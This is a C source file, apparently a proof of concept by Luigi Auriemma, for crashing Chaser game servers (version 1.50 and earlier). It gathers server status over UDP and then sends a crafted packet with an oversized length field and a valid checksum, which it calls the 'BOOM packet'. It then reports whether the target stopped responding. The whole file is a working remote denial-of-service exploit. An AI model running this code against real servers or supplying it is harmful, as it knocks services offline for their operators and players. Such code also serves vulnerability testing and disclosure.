/*

by Luigi Auriemma

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "chaser_crc.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER     "0.1"
#define PORT    3000
#define TIMEOUT 5



void gs_info_udp(u_int ip, u_short port);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    int         sd,
                err;
    u_short     port = PORT;
    u_char      pck[] =
                "\x00"
                "\x00\x00"      // checksum
                "\x00\x00\xFF"
                "\xff\xff"      // <--- packet size BUG
                "\x00\x00\x00\x00\x00\x00";
    struct  sockaddr_in peer;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "Chaser <= 1.50 remote server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <host> [port(%d)]\n"
            "\n", argv[0], PORT);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\nTarget is %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    fputs("Get informations:\n", stdout);
    gs_info_udp(peer.sin_addr.s_addr, port);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    *(u_short *)(pck + 1) = chaser_crc(pck + 3, sizeof(pck) - 4);

    fputs("Sending BOOM packet:\n", stdout);
    err = sendto(sd, pck, sizeof(pck) - 1, 0, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) std_err();

    err = timeout(sd);
    if(err < 0) {
        fputs("\nServer IS vulnerable!!!\n", stdout);
    } else {
        fputs("\nServer is NOT vulnerable\n", stdout);
    }

    close(sd);
    return(0);
}



void gs_info_udp(u_int ip, u_short port) {
    struct  sockaddr_in peer;
    int     sd,
            err,
            psz,
            nt = 1;
    u_char  buff[2048],
            *p1,
            *p2;

    peer.sin_addr.s_addr = ip;
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;
    psz                  = sizeof(peer);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    err = sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, psz);
    if(err < 0) std_err();
    err = timeout(sd);
    if(err < 0) {
        fputs("\nError: socket timeout\n", stdout);
        exit(1);
    }
    err = recvfrom(sd, buff, sizeof(buff) - 1, 0, (struct sockaddr *)&peer, &psz);
    if(err < 0) std_err();

    buff[err] = 0;
    p1 = buff;
    while(1) {
        p2 = strchr(p1, '\\');
        if(!p2) break;
        *p2 = 0;

        if(!nt) {
            printf("%20s: ", p1);
            nt++;
        } else {
            printf("%s\n", p1);
            nt = 0;
        }
        p1 = p2 + 1;
    }
    printf("%s\n\n", p1);
    close(sd);
}



int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif



